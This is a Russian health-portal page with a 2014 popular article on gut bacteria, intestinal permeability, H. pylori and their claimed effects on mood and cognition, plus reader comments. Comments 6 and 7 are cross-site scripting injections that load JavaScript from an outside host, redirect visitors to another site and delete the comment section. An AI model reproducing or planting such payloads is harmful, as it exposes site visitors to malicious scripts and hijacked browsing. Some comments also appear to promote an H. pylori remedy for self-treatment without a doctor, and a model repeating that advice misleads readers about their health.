Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Бактерии управляют вашим ...  >>  Бактерии управляют вашим настроением
 
Обратная связь
 

Бактерии управляют вашим настроением

Размер шрифта
03 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Последние исследования однозначно свидетельствуют в пользу того, что мозг и пищеварительный тракт неразрывно связаны: диета и кишечные бактерии способны влиять на наше поведение, мысли и настроение. В том числе – приводить к депрессии!

Бактерии управляют вашим настроением

В норме стенка желудочно-кишечного тракта непроницаема для бактерий и многих токсинов. Однако в ряде случаев целостность этой стенки компрометируется, в результате чего микробы могут попасть в кровоток. Ученые обнаружили, что этот феномен отмечается примерно у 35% пациентов с клинической депрессией.

Ученые точно не знают, каким именно образом «течь в кишке» приводит к депрессии, но есть ряд предположений. Бактерии в кровяном русле могут активировать аутоиммунный ответ и воспалительную реакцию, которые, в свою очередь, затрагивают центральную нервную систему. На сегодняшний день такая сверхпронициаемость кишечной стенки лечится комбинацией препаратов с антиоксидантными и противовоспалительными свойствами (глутамин, N-ацетилцистеин и цинк).

Причины повышения проницаемости:

1.   Злоупотребление обезболивающими препаратами

2.   Злоупотребление антибиотиками

3.   Инфекции (например, ВИЧ)

4.   Аутоиммунные заболевания

5.   Алкоголь

6.   Воспалительные заболевания кишечника

7.   Глютеновая энтеропатия (целиакия)

8.   Пищевые аллергии

9.   Радиационная терапия

10. Психологический стресс и истощение

Бактерии из язвы могут приводить к снижению умственных способностей

Среди бактерий, которые могут внепланово попадать в кровоток, может оказаться Helicobacter pylori. Разрушительная деятельность именно этого микроба лежит в основе развития язвы желудка. Попав в кровь, хеликобактер не перестает вредительствовать: показано, что H. pylori может приводить к снижению когнитивных способностей или даже к болезни Альцгеймера (что было показано с помощью специальных интеллектуальных тестов).

По всей видимости, H. pylori проникает в мозг, где образует преципитат с патологическим белком амилоидом (который характерен для болезни Альцгеймера). Это и приводит в итоге к ускоренному развитию патологического процесса.

Известно, что хеликобактером заражено порядка 20% людей моложе сорока лет и не менее 50% тех, кто старше шестидесяти.

Другие микробы, которые могут негативно влиять на мозг

Согласно предварительным данным, следующие бактерии могут оказывать опосредованное воздействие на ментальную сферу:

1.   H. pylori и успеваемость у детей: показано, что дети, инфицированные хеликобактером, в целом хуже справляются с IQ-тестами.

2.   Lactobacillus helveticus и bifidobacterium longum: добровольцы, которые выпили пробиотическую смесь с этими микробами, позднее констатировали снижение тревоги и депрессивных мыслей.

3.   Пробиотические бактерии B. animalis subsp. lactis, Streptococcus thermophilus, L. delbrueckii subsp. bulgaricus, L. lactis subsp. lactis: в головном мозге здоровых женщин-добровольцев, которые съели йогурт с этими бактериями в составе, отмечалось снижение активности в тех регионах, которые участвуют в обработке эмоций и физических ощущений. Исследователи все еще не знают, рассматривать ли данный эффект как полезный или же, напротив, вредительский; загадкой остается и механизм, посредством которого реализовывалось это влияние.

4.   Lactobacilli: у здоровых студентов во время экзаменационной сессии в стуле обнаруживалось сниженное содержание этих бактерий по сравнению с менее стрессовыми периодами жизни.

Таким образом, наука лишь начинает подступать к подлинному пониманию сути и функциональной значимости кишечной микрофлоры. Одно ясно наверняка: к ней нужно относиться бережно! Как сохранить ее в целости и сохранности – читайте на страницах нашего специального проекта «Жизнь без антибиотиков».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

16 марта 2015 в 12:24

Цитировать   |   Пожаловаться

Ого Hpylori еще и на умственную деятельность влияют, я думала только грозят гастритом и другими проблемами с жкт, как раз сейчас от хеликобактера пью хелинорм, тем более что это на умственную деятельность тоже влияет

2 - Гость

18 марта 2015 в 12:35

Цитировать   |   Пожаловаться

да я тоже не знала, что это на умственной деятельности может отображаться..( еще один повод заняться профилактикой и здоровьем жкт(

3 - Гость

20 марта 2015 в 15:52

Цитировать   |   Пожаловаться

Ужас какой, вот так и не знаешь, что у тебя там какие-то бактерии, а потом думаем, откуда проблемы со здоровьем...причем по всем фронтам. Надо будет обязательно пройти тест на хеликобактер, раз они так распространены. А как вы от них избавляетесь?

4 - nastyakim

23 марта 2015 в 15:35

Цитировать   |   Пожаловаться

Гость 20 марта 2015 в 15:52
А как вы от них избавляетесь?
 Ну тут от степени заражения ещё зависит. Если уже есть гастрит или язва, то надо конечно с врачом советоваться, а если просто хеликобактер хотите вывести как профилактика, то подойдет. Я его принимала, побочных не было и принимать легко.

5 - Гость

24 марта 2015 в 16:19

Цитировать   |   Пожаловаться

nastyakim 23 марта 2015 в 15:35
 Ну тут от степени заражения ещё зависит. Если уже есть гастрит или язва, то надо конечно с врачом советоваться, а если просто хеликобактер хотите вывести как профилактика, то подойдет. Я его принимала, побочных не было и принимать легко.
 Спасибо, попробую! Степень, я думаю, небольшая, гастрита нет. Надеюсь в сочетании с питанием этого хватит.

6 - zzzzzz

30 июня 2015 в 18:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

7 - zzzzzz

30 июня 2015 в 22:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Ваша печень сжирает ваш мозг   Горячий шоколад защищает мозг   Все что надо знать о бронхите   Как первым увидеть в толпе звезду? У нас есть научный ответ!  
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума?
 
28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Как сохранить мозги в 40 лет
Как сохранить мозги в 30 лет
Что может скрывать депрессия

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.